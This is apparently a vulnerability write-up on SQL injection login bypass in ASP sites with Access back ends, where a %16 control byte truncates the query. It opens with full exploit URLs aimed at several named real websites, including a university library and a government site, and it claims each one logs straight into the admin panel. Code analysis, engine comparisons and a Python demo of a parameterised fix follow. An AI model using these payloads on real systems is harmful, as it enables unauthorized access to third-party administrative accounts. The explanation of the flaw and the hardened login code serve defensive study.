From a single injection point to ACCESS query truncation with %16


http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?admin=1'%20and%20exists%20(select%20*%20from%20admin1)%20and%20'1'='1&password=1&Submit=%c8%b7%20%b6%a8

Appending a boolean condition like this (here `exists (select * from admin1)`) is also a quick way to confirm that the injection is real: the response differs depending on whether the condition evaluates true or false.

ORDER BY shows that the query returns 4 columns:

http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

http://www.botou.gov.cn/yj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

http://210.41.160.9:84/huang/nbzy/hjyj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

http://www.qzgl.cn/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

Every one of the links above logs you straight into the admin area:


A brief analysis of what is going on above. The payload

admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

ends with %16; substitute most other characters for it and you no longer get straight into the system.

Let's look at what %16 actually is: it URL-decodes to a single byte, 0x16, the ASCII SYN (synchronous idle) control character, which has no printable form.



Let's look at the code:

Code:
admin1=request("admin")              ' taken straight from the request, no filtering at all
password1=request("password")
set rs=server.CreateObject("ADODB.RecordSet")
' plain string concatenation: admin1 lands inside the quotes unescaped
sql="select * from admin where admin='" & admin1 & "' and password='"&encrypt(password1)&"'"

The query as actually assembled is:

select * from admin where admin='1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects<0x16>' and password='<encrypt("1")>'

(<0x16> stands for the raw character %16 decodes to; WooYun won't let me paste it.) Right at that byte, Access stops parsing: %16 truncates the SQL query!

So effectively the query becomes:

select * from admin where admin='1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects

The admin table has four columns (id, admin, password and aleave, judging by the fields the login code reads below), so `SELECT 123,NULL,NULL,NULL` matches the column count and the UNION yields exactly one row: id=123 with every other column NULL. That is all the login needs, because it only checks whether the recordset is empty.

The rest of the code is unremarkable:

Code:
rs.open sql,conn,1
' any non-empty recordset counts as a successful login
if rs.eof and rs.bof then
response.write"<SCRIPT language=JavaScript>alert('用户名或密码不正确!');"
response.write"javascript:history.go(-1)</SCRIPT>"
response.end
else
' session values are copied from whatever row came back (here the UNIONed row: id=123, the rest NULL)
session("admin")=rs("admin")
session("username")=rs("admin")
session("userid")=rs("id")
session("password")=rs("password")
session("aleave")=rs("aleave")
Session("eWebEditor_User") = "admin"
Session("eWebEditor_Version") = "2.8.0"
response.redirect "admin.asp"
end if
rs.close
set rs=nothing


Local test:
Table structure:

Test 1:

SELECT * from admin where username='admin' and password='123';

Test 2 (with the %16 character added):

The password condition after it has clearly been truncated.

The same test on MySQL raises a syntax error outright.

On MSSQL, %16 is simply ignored, so the full WHERE clause, password check included, is still evaluated.

The truncation is therefore specific to the Access (Jet) engine; the identical payload does nothing useful against a MySQL or MSSQL back end.
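To tie the query analysis and the engine tests together, here is an added example (my own code, not from the original writeup or the affected site). It mirrors the string concatenation in chklogin.asp, URL-decodes the page's payload the way Request("admin") would, marks where the 0x16 byte falls and what gets dropped after it, and sets a parameterised login with a control-character check beside it. Assumptions: encrypt() is an MD5 stand-in (the page never shows its body), the sample table is constructed to match the four columns the login code reads, and SQLite is used as a fourth back end alongside the page's Access/MySQL/MSSQL tests.

```python
# Added example, not code from the original writeup. It mirrors the
# concatenation in chklogin.asp, URL-decodes the page's payload, marks
# where the 0x16 byte falls, and contrasts that with a parameterised
# login. Assumptions: encrypt() is an MD5 stand-in (the page never shows
# its body); the table below is constructed to match the columns the
# login code reads; SQLite stands in as a fourth back end.
import hashlib
import sqlite3
from urllib.parse import unquote

# The admin= parameter exactly as it appears in the page's URLs.
PAYLOAD = ("1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL"
           "%20FROM%20MSysAccessObjects%16")


def encrypt(password):
    """Stand-in for the page's encrypt(); MD5 hex is an assumption."""
    return hashlib.md5(password.encode()).hexdigest()


def decode_param(value):
    """What Request("admin") hands the script: %16 becomes a raw 0x16 byte."""
    return unquote(value)


def build_vulnerable_query(admin1, password1):
    """Same concatenation as the ASP line:
    sql="select * from admin where admin='" & admin1 & "' and password='"&encrypt(password1)&"'"
    """
    return ("select * from admin where admin='" + admin1
            + "' and password='" + encrypt(password1) + "'")


def split_at_truncation(sql):
    """Split the statement at the first 0x16 byte into (part Access runs,
    part dropped), following the page's observation that Jet stops there."""
    head, sep, tail = sql.partition("\x16")
    return head, sep + tail


def has_control_chars(value):
    """Input check a login handler should apply: no byte below 0x20, no DEL."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def make_demo_db():
    """Constructed sample table with the four columns the login code reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer, admin text, password text, aleave text)")
    conn.execute("insert into admin values (1, 'admin', ?, '0')", (encrypt("secret"),))
    return conn


def run_concatenated(conn, admin1, password1):
    """Run the concatenated statement against SQLite, a fourth engine beside
    the page's Access/MySQL/MSSQL tests. Returns 'rows=N' or 'error: ...'."""
    try:
        rows = conn.execute(build_vulnerable_query(admin1, password1)).fetchall()
        return "rows=%d" % len(rows)
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc


def safe_login(conn, admin1, password1):
    """Hardened form: reject control characters, bind parameters.
    Returns the matching (id, admin, password, aleave) row or None."""
    if has_control_chars(admin1) or has_control_chars(password1):
        return None
    cur = conn.execute(
        "select id, admin, password, aleave from admin where admin=? and password=?",
        (admin1, encrypt(password1)))
    return cur.fetchone()


if __name__ == "__main__":
    injected = decode_param(PAYLOAD)
    executed, dropped = split_at_truncation(build_vulnerable_query(injected, "1"))
    print("Access would run :", executed)
    print("dropped          :", repr(dropped))
    conn = make_demo_db()
    print("SQLite, concat   :", run_concatenated(conn, injected, "1"))
    print("safe_login attack:", safe_login(conn, injected, "1"))
    print("safe_login legit :", safe_login(conn, "admin", "secret"))
```

Running it prints the statement up to `FROM MSysAccessObjects` as the part Access executes and `\x16' and password='...'` as the part that is lost, which is exactly why the password never matters. SQLite, like MySQL, refuses the statement rather than truncating it, so the same payload fails there; the parameterised safe_login fails it everywhere, because the payload is bound as a literal username and the control-character check rejects it before the query is even built.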